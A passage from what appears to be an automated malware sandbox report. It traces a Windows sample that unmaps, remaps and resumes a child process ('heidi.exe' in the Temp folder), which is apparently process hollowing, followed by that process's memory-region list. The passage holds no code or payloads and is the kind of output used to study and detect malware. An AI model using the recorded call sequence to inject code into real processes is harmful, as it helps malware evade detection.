[45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x473ca8, Ebp=0x0, Eip=0x77b701c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0133.364] NtUnmapViewOfSection (ProcessHandle=0xdc, BaseAddress=0x400000) returned 0x0 [0133.364] NtCreateSection (in: SectionHandle=0x18fa44, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x18f7a8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fa44*=0xe4) returned 0x0 [0133.364] NtMapViewOfSection (in: SectionHandle=0xe4, ProcessHandle=0xffffffff, BaseAddress=0x18fa4c*=0x0, ZeroBits=0x0, CommitSize=0xa2000, SectionOffset=0x0, ViewSize=0x18f7a8*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x18fa4c*=0x1ed0000, SectionOffset=0x0, ViewSize=0x18f7a8*=0xa2000) returned 0x0 [0133.364] NtMapViewOfSection (in: SectionHandle=0xe4, ProcessHandle=0xdc, BaseAddress=0x18fa28*=0x400000, ZeroBits=0x0, CommitSize=0xa2000, SectionOffset=0x0, ViewSize=0x18f7a8*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x18fa28*=0x400000, SectionOffset=0x0, ViewSize=0x18f7a8*=0xa2000) returned 0x0 [0133.365] NtCreateSection (in: SectionHandle=0x18fa48, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x18f7a8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x18fa48*=0xe0) returned 0x0 [0133.365] NtMapViewOfSection (in: SectionHandle=0xe0, ProcessHandle=0xdc, BaseAddress=0x18fa30*=0x0, ZeroBits=0x0, CommitSize=0x1000, SectionOffset=0x0, ViewSize=0x18f7a8*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x18fa30*=0x1a0000, SectionOffset=0x0, ViewSize=0x18f7a8*=0x1000) returned 0x0 [0133.365] NtMapViewOfSection (in: SectionHandle=0xe0, ProcessHandle=0xffffffff, BaseAddress=0x18fa20*=0x0, ZeroBits=0x0, CommitSize=0x1000, SectionOffset=0x0, ViewSize=0x18f7a8*=0x0, InheritDisposition=0x2, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x18fa20*=0x1c70000, SectionOffset=0x0, ViewSize=0x18f7a8*=0x1000) returned 0x0 [0133.365] SetThreadContext (hThread=0xd8, lpContext=0x3f0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x4139de, Ebp=0x0, Eip=0x77b701c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0133.365] NtResumeThread (in: ThreadHandle=0xd8, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0133.365] ExitProcess (uExitCode=0x0) Process: id = "4" image_name = "heidi.exe" filename = "c:\\users\\kft6utqw\\appdata\\local\\temp\\heidi.exe" page_root = "0x5987f000" os_pid = "0xa70" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe\" " cur_dir = "C:\\Users\\kFT6uTQW\\Desktop\\" os_username = "XABNCPUWKW\\kFT6uTQW" os_groups = "XABNCPUWKW\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000de82" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1113 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1114 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1115 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1116 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1117 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1118 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 1119 start_va = 0x400000 end_va = 0x4b8fff entry_point = 0x400000 region_type = mapped_file name = "heidi.exe" filename = "\\Users\\kFT6uTQW\\AppData\\Local\\Temp\\heidi.exe" (normalized: "c:\\users\\kft6utqw\\appdata\\local\\temp\\heidi.exe") Region: id = 1120 start_va = 0x77980000 end_va = 0x77b28fff entry_point = 0x77980000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1121 start_va = 0x77b60000 end_va = 0x77cdffff entry_point = 0x77b60000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1122 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1123 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1124 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1125 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1126 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1127 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1128 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1130 start_va = 0x400000 end_va = 0x4a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1131 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1133 start_va = 0x260000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 1134 start_va = 0x74ef0000 end_va = 0x74ef7fff entry_point = 0x74ef0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1135 start_va = 0x74f00000 end_va = 0x74f5bfff entry_point = 0x74f00000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1136 start_va = 0x74f60000 end_va = 0x74f9efff entry_point = 0x74f60000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1137 start_va = 0x77760000 end_va = 0x77859fff entry_point = 0x0 region_type = private name = "private_0x0000000077760000" filename = "" Region: id = 1138 start_va = 0x77860000 end_va = 0x7797efff entry_point = 0x0 region_type = private name = "private_0x0000000077860000" filename = "" Region: id = 1139 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1140 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1141 start_va = 0x350000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1142 start_va = 0x560000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1143 start_va = 0x756b0000 end_va = 0x756bbfff entry_point = 0x756b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1144 start_va = 0x756c0000 end_va = 0x7571ffff entry_point = 0x756c0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1145 start_va = 0x757f0000 end_va = 0x7587efff entry_point = 0x757f0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1146 start_va = 0x75930000 end_va = 0x75a2ffff entry_point = 0x75930000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1147 start_va = 0x75e10000 end_va = 0x75f6bfff entry_point = 0x75e10000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1148 start_va = 0x76010000 end_va = 0x760fffff entry_point = 0x76010000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1149 start_va = 0x76d50000 end_va = 0x76decfff entry_point = 0x76d50000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1150 start_va = 0x76df0000 end_va = 0x76efffff entry_point = 0x76df0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1151 start_va = 0x76f00000 end_va = 0x76f09fff entry_point = 0x76f00000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1152 start_va = 0x77330000 end_va = 0x773cffff entry_point = 0x77330000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 